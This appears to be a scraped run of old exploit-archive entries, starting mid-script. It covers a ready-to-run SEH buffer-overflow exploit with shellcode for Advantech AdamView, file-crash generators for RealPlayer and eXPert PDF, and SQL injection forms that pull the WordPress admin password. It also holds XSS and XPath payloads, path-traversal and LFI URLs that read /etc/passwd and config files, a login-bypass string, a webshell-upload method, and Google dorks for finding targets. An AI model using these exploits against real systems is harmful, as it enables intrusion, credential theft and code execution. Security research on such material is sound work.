print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
# Thanks To : ' PLATEN ' & All Iranian MusLim HacKers
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
# Exploit Title: WP Symposium 14.10 SQL Injection
# Date: 22-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
# Category: webapps
# CVE: CVE-2014-8810
1. Description
$_POST['tray'] is not escaped.
File: wp-symposium\ajax\mail_functions.php
$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
2. Proof of Concept
Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="getMailMessage">
Message ID: <input type="text" name="mid"><br />
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
<input type="submit" value="Inject">
</form>
Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
3. Solution:
Update to version 14.11
http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
#!/usr/bin/env ruby
# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
# Date: Dec 09 2014
# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
# Version: 4.30.003
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-8386
# Advisory ID: CORE-2014-0008
filename = "crash-it.gni"
buf = "A" * 1022
seh = 134
# bad chars '\x61 .. \x7a'
# pop mspaint
sc =
"\xb8\x99\x4e\x83\xd1\x2d\x1f\x10\x10\x10\x50" +
"\xb8\xcb\xaf\xe6\x3e\x50\xb8\xc5\xf9\x87\x7b" +
"\x2d\x1f\x1f\x1f\x1f\x50\xb8\x9f\x7b\x5d\x8b" +
"\x2d\x1f\x16\x16\x16\x50\xb8\x8a\x27\xe6\xa0" +
"\x2d\x1f\x10\x10\x10\x50\xb8\x1e\x12\x8a\x16" +
"\x50\xb8\x09\x7b\x7e\x17\x2d\x1f\x11\x11\x11" +
"\x50\xb8\x3f\x2a\x50\x85\x50\xb8\xc9\x97\x1d" +
"\x82\x2d\x1f\x10\x10\x10\x50\xb8\x9d\x81\x7b" +
"\xc2\x2d\x1f\x17\x17\x17\x50\xb8\xca\x1d\x8a" +
"\x59\x2d\x1f\x10\x10\x10\x50\xb8\x20\x42\xfd" +
"\xb4\x50\xb8\x1e\xe1\x94\x85\x50\xb8\x82\x94" +
"\xa3\x85\x2d\x1f\x10\x10\x10\x50\xb8\x38\xc9" +
"\x4c\xf7\x50\xb8\x33\xda\x17\x4d\x50\xb8\x42" +
"\x82\xb6\xf8\x2d\x1f\x10\x10\x10\x50\xb8\x91" +
"\xa6\xd0\xe7\x2d\x1f\x10\x10\x10\x50\xb8\x56" +
"\xca\x13\xb6\x50\xb8\x8f\x4a\x57\xa1\x2d\x1f" +
"\x10\x10\x10\x50\xb8\x1a\x4f\xda\x7e\x2d\x1f" +
"\x10\x10\x10\x50\xb8\x93\x1a\xcb\xb9\x50\xb8" +
"\xd0\x15\x7e\xad\x50\xb8\xf0\xe4\xaa\x2b\x50" +
"\xb8\xec\x43\xd9\x88\x50\xb8\x17\x39\xfd\xfd" +
"\x50\xb8\xdb\x3a\x40\xfa\x50\xb8\x9a\xfd\x9f" +
"\x8f\x50\xb8\xa3\x31\x12\x4d\x50\xb8\x5a\xff" +
"\x2d\x9e\x50\xb8\xa9\xfc\xfb\x4f\x50\xb8\x84" +
"\xe2\x7b\xa1\x2d\x2f\x2d\x2d\x2d\x50\xb8\x84" +
"\x98\xad\x7b\x2d\x1f\x14\x14\x14\x50\xb8\x2d" +
"\x1c\x91\x38\x50\xb8\x22\xcb\x39\x23\x50\xb8" +
"\x07\xf4\x4c\x89\x50\xb8\xc7\x7f\xec\xee\x50" +
"\xb8\xa2\x3a\x2f\xcf\x50\xb8\xe9\x2d\x7c\xde" +
"\x50\xb8\xcb\x40\x83\x9a\x2d\x1f\x10\x10\x10" +
"\x50\xb8\x8d\xfe\x7e\x4b\x50\xb8\x10\x0d\x3b" +
"\x7b\x2d\x1f\x10\x10\x10\x50\xb8\x2d\x2e\xe8" +
"\xe9\x50\xb8\xea\x10\xe7\xd7\x2d\x1f\x10\x10" +
"\x10\x50\xb8\xe2\x0a\x7b\x83\x2d\x1f\x1b\x1b" +
"\x1b\x50\xb8\x8d\xfb\xc4\x04\x50\xb8\xe5\xa6" +
"\x34\x7f\x2d\x1f\x10\x10\x10\x50\xb8\xaf\xf9" +
"\x91\x7b\x2d\x1f\x1c\x1c\x1c\x50\xb8\x19\x38" +
"\x44\x4d\x50\xb8\xd1\xc7\xb3\x2a\x50\xb8\x22" +
"\x7b\x27\xf3\x2d\x1f\x11\x11\x11\x50\xb8\x23" +
"\x42\x7b\x27\x2d\x1f\x11\x11\x11\x50\xb8\xb1" +
"\x32\x83\xc2\x50\xb8\xf4\x5a\x31\xc9\x50\xb8" +
"\xc2\xe9\x84\x34\x2d\x1f\x10\x10\x10\x50\xb8" +
"\xbd\x24\x3b\x5b\x50\xb8\x90\x90\xda\xc3\x50"
buf[seh-4,4] = "\xeb\x0a\x41\x41" # jmp $+16
buf[seh,4] = [0x22b0249b].pack("V").force_encoding("utf-8") # ppr
buf[seh+8,6] = "\x81\xc4\x54\xf2\xff\xff" # add esp,-3500
buf[seh+14,sc.size] = sc
buf[seh+(14+sc.size),2] = "\xff\xd4"
gni_file =
"\x41\x47\x4e\x49\xae\x01\x04\x00" +
"\x27\x48\x00\x00\x27\x48\x00\x00" +
"\x27\x48\x00\x00\x27\x48\x00\x00" +
"\x27\x48\x00\x00\x27\x48\x00\x00" +
"\x27\x48\x00\x00\x48\x45\x41\x44" +
"\x16\x00\x27\x00\x00\x00\x00\x00" +
"\x00\x00\x32\x00\x00\x00\x00\xff" +
"\x00\x00\x00\x00\x80\x02\xe0\x01" +
"\x53\x57\x50\x4c\x30\x00\x00\x00" +
"\x00\x00\x01\x00\x00\x00\xfe\xfe" +
"\xff\xff\xff\xff\xff\xff\xff\xff" +
"\xff\xff\xff\xff\xff\xff\x00\x00" +
"\x00\x00\x00\x00\x00\x00\xb0\x04" +
"\x00\x00\xb7\x01\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x42\x54" +
"\x53\x4b\x76\x00\x01\x00\x00\x00" +
"\x2a\x01\x01\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x01\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x05\x00\x00\x00" +
"\x54\x41\x53\x4b\x31\x00\x00\x00" +
"\x00\x00\x00\x01\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x02\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\xc8\x42\x45\x54\x53\x4b\x50\x57" +
"\x50\x4c\x3d\x00\x00\x00\x00\x00" +
"\x01\x00\x00\x00\xff\xff\xff\xff" +
"\xff\xff\xff\xff\xff\xff\xff\xff" +
"\xff\xff\xff\xff\x16\x00\x00\x00" +
"\x1d\x00\x00\x00\xc6\x04\x00\x00" +
"\xbc\x01\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x07\x01" +
"\x00\xfe\x03" + buf + # '\xfe\x03' controlled buffer size
"\x00\x50\x45\x4e\x44\x46\x56\x4b" +
"\x53\x24\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x01\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x4e\x45\x54" +
"\x4b\x41\x44\x41\x4d\x56\x69\x65" +
"\x77\x00\x00\x00\x00\xd0\x07\xd0" +
"\x07\x01\x00\x00\x00\x01\x00\x00" +
"\x00\x5a\x45\x4f\x46"
bug = gni_file
File.open(filename,"wb") do |fp|
fp.write(bug)
fp.close
end
source: https://www.securityfocus.com/bid/47040/info
eXPert PDF is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : eXPert PDF Batch Creator v7 Denial of Service Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Blocked 'vsbatch2pdf.exe' When Generate
# Tested on : Windows XP SP3 Fran�ais
# Target : eXPert PDF Editor v7.0.880.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |=============================================|\n";
print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n";
print " |= [!] Exploit : Denial of Service Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |=============================================|\n";
sleep(2);
print "\n";
my $junk = "http://"."\x41" x 17425;
open(file , ">", "Kedans.html");
print file $junk;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
source: https://www.securityfocus.com/bid/47039/info
RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
RealPlayer 11.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : RealPlayer v11.0 (.rmp) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Buffer Overflow
# Tested on : Windows XP SP3 Fran.ais
# Target : RealPlayer v11.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# -----------------
# XML version : 1.0 in (Real Metadata Package File)
# <?xml version="1.0"?>
# <embed src="rtsp:// **BUFFER ** " autoplay="whatever" />Null
# -----------------
#START SYSTEM /root@MSdos/ :
# -----------------
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |============================================================|\n";
print " |= [!] Name : RealPlayer v11.0 Real Metadata Package File =|\n";
print " |= [!] Exploit : Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |============================================================|\n";
sleep(2);
print "\n";
# Parameter OverFlow =>
my $kA = "\x41" x 333 ; # A * 333
my $kB = "\x42" x 333 ; # B * 333
my $kC = "\x43" x 333 ; # C * 333
my $buffer = $kA.$kB.$kC ;
my $header =
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
"\x2e\x30\x22\x3f\x3e\x0d\x0d\x3c\x65\x6d\x62\x65\x64\x20\x73\x72".
"\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f\x2f".$buffer."\x22\x20\x61\x75\x74\x6f".
"\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76\x65\x72\x22\x20".
"\x2f\x3e\x00";
# Creating ...
my $kedans = $header ; # |=:: Header & AAA...BBB...CC etc ::=|
open (FILE ,"> Crash.rmp"); # Evil File Here
print FILE $kedans ;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close (FILE);
source: https://www.securityfocus.com/bid/47037/info
Family Connections is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
Family Connections 2.3.2 is vulnerable; other versions may also be affected.
<!--
Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2
Summary: Family Connections is an open source
content management system. It makes creating a
private, family website easy and fun.
Desc: FCMS suffers from a stored XSS vulnerability
(post-auth) in messageboard.php script thru the
'subject' post parameter. XPath lies in the
/inc/getChat.php script with 'users' get parameter with
no args, and post parameter 'message'.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php
22.03.2011
-->
<html>
<title>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xpath(){document.forms["xpath"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xpath">
<input type="hidden" name="message" value="\\';--\\";--" /></form>
<a href="javascript: xpath();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XPath!<h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
<input type="hidden" name="post" value="waddup" />
<input type="hidden" name="name" value="1" />
<input type="hidden" name="post_submit" value="Submit" /></form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XSS!<h3></center></font></b></a>
</body></html>
source: https://www.securityfocus.com/bid/47027/info
netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
netjukebox 5.25 is vulnerable; other versions may also be affected.
http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
source: https://www.securityfocus.com/bid/47017/info
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
source: https://www.securityfocus.com/bid/47015/info
GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected.
http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert('XSS1!')</script>&uniqueId=<script>alert('XSS2!')</script>#
http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert('XSS1!')</script>&traceLevel=<script>alert('XSS2!')</script>#
source: https://www.securityfocus.com/bid/47014/info
MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MC Content Manager 10.1.1 is vulnerable; other versions may also be affected.
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="remind">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'>
</form>
source: https://www.securityfocus.com/bid/47008/info
Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.
An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.
Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35495.zip
######################
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Link : Premium
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Date : 2014-12-06
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]
"download_file" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
# Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Author will be not responsible for any damage. «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue:
x SQL Injection Bypass Login
x
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to login into website with access level as admin.
x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username : ' OR 1=1 #
## Password : barrabravaz
##
##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##############################################################################
# Exploit Title : PBBoard CMS Stored xss vulnerability
# Author : Manish Kishan Tanwar
# Vendor : http://www.pbboard.info/
# version affected: all
# Date : 7/12/2014
# Discovered @ : INDISHELL Lab
# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
# email : manish.1046@gmail.com
##############################################################################
////////////////////////
/// Overview:
////////////////////////
Program PBBoard is interactive Forum management program Dialogic
Free classified software Free and open source.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
Stored xss vulnerability exist in "send private message" module, a user can send xss crafted private message to other user, and when reciever will open the message xss payload will execute
//////////////////////////////
/// Proof of Concept: -
//////////////////////////////
go to "inbox", click "compose message"
type username, title and message body , intercept the request and change the
content of "text" parameter with xss payload
when reciever will open the message, xss payload will execute
Proof image:- http://oi57.tinypic.com/112d5cx.jpg
//////////////////////
///Demo POC Request///
//////////////////////
POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica
Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------147872036312473
Content-Length: 670
-----------------------------147872036312473
Content-Disposition: form-data; name="to[]"
ica
-----------------------------147872036312473
Content-Disposition: form-data; name="title"
hi
-----------------------------147872036312473
Content-Disposition: form-data; name="text"
hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">//
-----------------------------147872036312473
Content-Disposition: form-data; name="icon"
look/images/icons/i1.gif
-----------------------------147872036312473
Content-Disposition: form-data; name="insert"
Save
-----------------------------147872036312473--
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
source: https://www.securityfocus.com/bid/47006/info
Perl is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users.
#!/usr/bin/perl
my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}
IceHrm <=7.1 Multiple Vulnerabilities
Vendor: IceHRM
Product web page: http://www.icehrm.com
Affected version: <= 7.1
Summary: IceHrm is Human Resource Management web software
for small and medium sized organizations. The software is
written in PHP. It has community (free), commercial and
hosted (cloud) solution.
Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
including Local File Inclusion, Cross-Site Scripting, Malicious
File Upload, Cross-Site Request Forgery and Code Execution.
Tested on: Apache/2.2.15 (Unix)
PHP/5.3.3
MySQL 5.1.73
Vulnerabilities discovered by Stefan 'sm' Petrushevski
@zeroscience
Advisory ID: ZSL-2014-5215
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php
01.12.2014
---
1. Local File Inclusion (LFI)
#####################################################
File:
app/index.php
Vulnerable code:
---- snip ----
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
app/?g=../&n=../../../../etc/passwd%00
---- snip ----
Proof of Concept (PoC):
http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00
Severity: CRITICAL
#####################################################
2. Local File Inclusion (LFI)
#####################################################
File:
service.php
Vulnerable code:
---- snip ----
if($action == 'download'){
$fileName = $_REQUEST['file'];
$fileName = CLIENT_BASE_PATH.'data/'.$fileName;
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($fileName));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($fileName));
ob_clean();
flush();
readfile($fileName);
---- snip ----
Proof of Concept (PoC):
http://zsltest/icehrm/app/service.php?a=download&file=../config.php
Severity: CRITICAL
#####################################################
3. Malicious File Upload / Code Execution
#####################################################
File:
fileupload.php
Vulnerable code:
---- snip ----
//Generate File Name
$saveFileName = $_POST['file_name'];
if(empty($saveFileName) || $saveFileName == "_NEW_"){
$saveFileName = microtime();
$saveFileName = str_replace(".", "-", $saveFileName);
}
$file = new File();
$file->Load("name = ?",array($saveFileName));
// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
// max file size in bytes
$sizeLimit =MAX_FILE_SIZE_KB * 1024;
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
// to pass data through iframe you will need to encode all html tags
if($result['success'] == 1){
$file->name = $saveFileName;
$file->filename = $result['filename'];
$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
$file->file_group = $_POST['file_group'];
$file->Save();
$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
$result['data'] .= "|".$saveFileName;
$result['data'] .= "|".$file->id;
}
---- snip ----
Proof of Concept (PoC) method:
1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
2. Create a malicious file (php shell) save it with .txt extension
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.
PoC example:
